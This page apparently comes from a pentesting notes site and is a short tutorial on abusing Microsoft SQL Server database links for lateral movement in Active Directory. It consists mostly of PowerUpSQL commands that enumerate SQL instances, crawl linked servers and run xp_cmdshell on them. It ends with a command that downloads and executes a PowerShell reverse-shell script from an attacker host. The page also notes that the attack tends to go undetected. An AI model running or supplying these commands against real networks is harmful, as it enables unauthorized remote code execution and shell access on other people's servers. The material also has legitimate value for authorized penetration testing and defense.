☠️
Pentesting Articles and Notes
  • Welcome!
  • Windows
    • Active Directory
      • Kerberos Authentication
      • Enumeration
        • Basic Enumeration
        • Access Control Lists
        • Domain Trusts and Forests Enumeration
        • User Hunting
        • Domain Enumeration With BloodHound
      • Credential Dumping
        • DCSync Attack
      • Privilege Escalation
        • AS-REP Roasting
        • Kerberoasting
        • DNS Administrators
        • Setting Object SPN's
        • Unconstrained Delegation
        • Constrained Delegation
      • Persistence
        • Abusing ACLs
        • AdminSDHolder
        • Custom Security Service Providers (SSP's)
        • Directory Services Restore Mode (DSRM)
        • Modifying Remote Protocol Security Descriptors
        • Golden Tickets
        • Silver Tickets
        • Skeleton Keys
      • Powershell Remoting
      • Lateral Movement
        • Child to Parent Movement Across Trusts
        • Trust Abuse Between Forests
        • MSSQL Server Trust Abuse
        • Overpass the Hash
  • Coding
    • Pentesting With Python
      • Basic Threading
  • Network Attacks
    • Man-In-The-Middle Attacks
      • ARP Spoofing
      • DNS Spoofing Attacks
Powered by GitBook
On this page
  • Enumeration
  • Finding Instances From SQL Servers That Have an SPN with the Domain Controller and Discovering Logon Sessions
  • Finding Accessible SQL Servers
  • Retrieve Basic Server and Information From Target SQL Servers For Each Instance
  • Searching Database Links
  • Now We Can Execute Commands
  • Get a Reverse Shell
  1. Windows
  2. Active Directory
  3. Lateral Movement

MSSQL Server Trust Abuse

Within Windows domains, plenty of servers deploy MSSQL, often on their own servers with users from other servers often connect to. If a domain has a SQL Server, it provides an excellent opportunity for lateral movement in a domain as domain users can be mapped to database roles.

What we can also take advantage are database links. Often, SQL Servers within a network are accessible to each other and the links between the different databases provide a unique way for us to traverse within the Active Directory network by indirectly being able to execute commands without leaving our current station. It works not only between domain trusts in a forest, but between separate forests as well.

These attacks can also go relatively undetected because of the fact you can execute commands on distant SQL Servers from your own machine.

Enumeration

We can use PowerUPSQL.ps1 to use to enumerate SQL Servers.

Finding Instances From SQL Servers That Have an SPN with the Domain Controller and Discovering Logon Sessions

Get-SQLInstanceDomain

Finding Accessible SQL Servers

Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Retrieve Basic Server and Information From Target SQL Servers For Each Instance

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Searching Database Links

Get-SQLServerLink -Instance <sql_server_domain> -Verbose

# Crawling downfield database links from a SQL Server you can access
Get-SQLServerLinkCrawl -Instance <sql_server_domain> -Verbose

Now We Can Execute Commands

Check the results next to the 'CustomQuery' header

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'whoami'"

Get a Reverse Shell

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'powershell.exe iex(New-Object Net.WebClient).downloadString(''http://<ip:port>/Invoke-PowerShellTcp.ps1'')'"
PreviousTrust Abuse Between ForestsNextOverpass the Hash

Last updated 3 years ago